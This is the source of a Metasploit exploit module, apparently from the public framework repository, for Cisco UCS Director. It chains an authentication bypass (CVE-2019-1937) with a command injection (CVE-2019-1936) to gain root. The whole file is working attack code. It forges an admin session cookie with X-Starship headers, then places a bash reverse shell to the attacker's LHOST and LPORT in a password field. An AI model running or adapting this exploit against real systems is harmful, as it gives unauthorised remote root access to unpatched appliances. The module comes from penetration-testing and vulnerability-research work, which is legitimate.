Path: blob/master/modules/exploits/linux/http/cisco_ucs_rce.rb
19758 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Cisco UCS Director Unauthenticated Remote Code Execution',15'Description' => %q{16The Cisco UCS Director virtual appliance contains two flaws that can be combined17and abused by an attacker to achieve remote code execution as root.18The first one, CVE-2019-1937, is an authentication bypass, that allows the19attacker to authenticate as an administrator.20The second one, CVE-2019-1936, is a command injection in a password change form,21that allows the attacker to inject commands that will execute as root.22This module combines both vulnerabilities to achieve the unauthenticated command23injection as root.24It has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.25Note that Cisco also mentions in their advisory that their IMC Supervisor and26UCS Director Express are also affected by these vulnerabilities, but this module27was not tested with those products.28},29'Author' => [30'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module31],32'License' => MSF_LICENSE,33'References' => [34[ 'CVE', '2019-1937' ], # auth bypass35[ 'CVE', '2019-1936' ], # command injection36[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby' ],37[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj' ],38[ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],39[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]40],41'Platform' => 'unix',42'Arch' => ARCH_CMD,43'DefaultOptions' => {44'payload' => 'cmd/unix/reverse_bash',45},46'Targets' => [47[ 'Cisco UCS Director < 6.7.2.0', {} ],48],49'Privileged' => true,50'DefaultTarget' => 0,51'DisclosureDate' => '2019-08-21',52'Notes' => {53'Reliability' => UNKNOWN_RELIABILITY,54'Stability' => UNKNOWN_STABILITY,55'SideEffects' => UNKNOWN_SIDE_EFFECTS56}57)58)5960register_options(61[62Opt::RPORT(443),63OptBool.new('SSL', [true, 'Connect with TLS', true]),64OptString.new('TARGETURI', [true, "Default server path", '/']),65]66)67end6869def check70# can't think of anything better then this71res = send_request_cgi({72'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'),73'method' => 'GET'74})75if res and res.code == 30276return Exploit::CheckCode::Detected77end7879return Exploit::CheckCode::Unknown80end8182def exploit83# step 1: get a JSESSIONID cookie84res = send_request_cgi(85'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'),86'method' => 'GET'87)8889if res and (res.code == 200 or res.code == 302)90jsession = res.get_cookies.split(';')[0]9192# step 2: authenticate our cookie as admin93res = send_request_cgi({94'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),95'cookie' => jsession,96'vars_get' =>97{98'apiName' => 'GetUserInfo'99},100'headers' =>101{102# X-Requested-With and Referer headers are needed, else the server ignores us103# The X-Starship headers are the key to this auth bypass vuln, see the References104'X-Requested-With' => 'XMLHttpRequest',105'Referer' => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/",106'X-Starship-UserSession-Key' => "#{rand_text_alpha(5..12)}",107'X-Starship-Request-Key' => "#{rand_text_alpha(5..12)}"108},109'method' => 'GET'110})111112if res and res.code == 200 and res.body.include?("admin")113if not res.get_cookies.empty?114# if the server returns a new cookie, use that115jsession = res.get_cookies.split(';')[0]116end117print_good("#{peer} - Successfully bypassed auth and got our admin JSESSIONID cookie!")118119# step 3: request our reverse shell120payload = %{{"param0":"admin","param1":{"ids":null,"targetCuicId":null,"uiMenuTag":23,"cloudName":null,"filterId":null,"id":null,"type":10},"param2":"scpUserConfig","param3":[{"fieldId":"FIELD_ID_USERNAME","value":"scpuser"},{"fieldId":"FIELD_ID_DESCRIPTION","value":"The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin."},{"fieldId":"FIELD_ID_PASSWORD","value":"`bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 &``"}]}}121122res = send_request_cgi({123'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),124'cookie' => jsession,125'headers' =>126{127# X-Requested-With and Referer headers are needed, else the server ignores us128# The X-Starship headers are the key to this auth bypass vuln, see the References129'X-Requested-With' => 'XMLHttpRequest',130'Referer' => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/",131},132'method' => 'POST',133'vars_post' =>134{135'formatType' => 'json',136'apiName' => 'ExecuteGenericOp',137'serviceName' => 'InfraMgr',138'opName' => 'doFormSubmit',139'opData' => payload140}141})142if res and res.code == 200143print_good("#{peer} - Shelly is here, press ENTER to start playing with her!")144end145else146fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")147end148else149fail_with(Failure::Unknown, "#{peer} - Failed to obtain JSESSIONID cookie")150end151end152end153154155